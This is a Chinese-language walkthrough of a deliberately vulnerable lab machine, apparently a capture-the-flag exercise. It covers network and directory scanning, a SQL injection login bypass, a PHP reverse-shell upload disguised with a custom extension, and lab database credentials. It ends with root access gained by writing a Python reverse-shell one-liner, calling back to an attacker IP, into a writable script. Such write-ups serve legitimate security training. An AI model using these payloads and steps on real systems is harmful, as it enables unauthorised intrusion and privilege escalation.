环境准备
靶机链接:百度网盘 请输入提取码
提取码:phzm
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机ip地址
arp-scan -l
2.探测目标开放端口和服务情况
nmap -p- -A -T4 192.168.1.105
3.用gobuster扫描目标网站的目录
gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
用gobusters扫描出一个可利用目录masteradmin
4.再次用gobuster详细扫描masteradmin目录
gobuster dir -u http://192.168.1.105/masteradmin -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
漏洞利用
1.首先我们尝试下是否有注入漏洞
2.发现‘or 1=1--' 可以注入成功 并且登录进去
3.进去之后发现是一个能上传文件的界面,
还是上传我们的php-reverse-shell.php 文件,
发现上传后 看不到反馈 决定抓包看下是否上传成功。
4.抓包后看到提示,让上传一个后缀为ceng的文件,那就把木马改成weiqin.ceng
5.成功上传文件
6.开启监听,拼接路径,触发木马
7.回弹shell成功,发现是一个普通用户
权限提升
1.尝试回弹一个交互式shell ,应该没有python,
用SHELL=bash script -q /dev/null 回弹 ,
发现一个有执行权限的用户cengover。
2.在masteradmin 下面有数据库配置文件 db.php
发现用户名 root 密码 SuperS3cR3TPassw0rd1!
3.登录数据库
4.正常查看数据库信息
5.得到一组用户名密码masteradmin C3ng0v3R00T1!
登录masteradmin用户 虽然是也是普通用户但他在user组里
发现md5check.py 可读可写,值得利用
6.谷歌搜索python reverse shell 将这句话写入md5check.py里
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
将python -c 后面的利用即可因为md5check.py文件本身就是python脚本
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.106",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /opt/md5check.py
7.开启监听成功反弹shell 发现是root 成功拿下!!!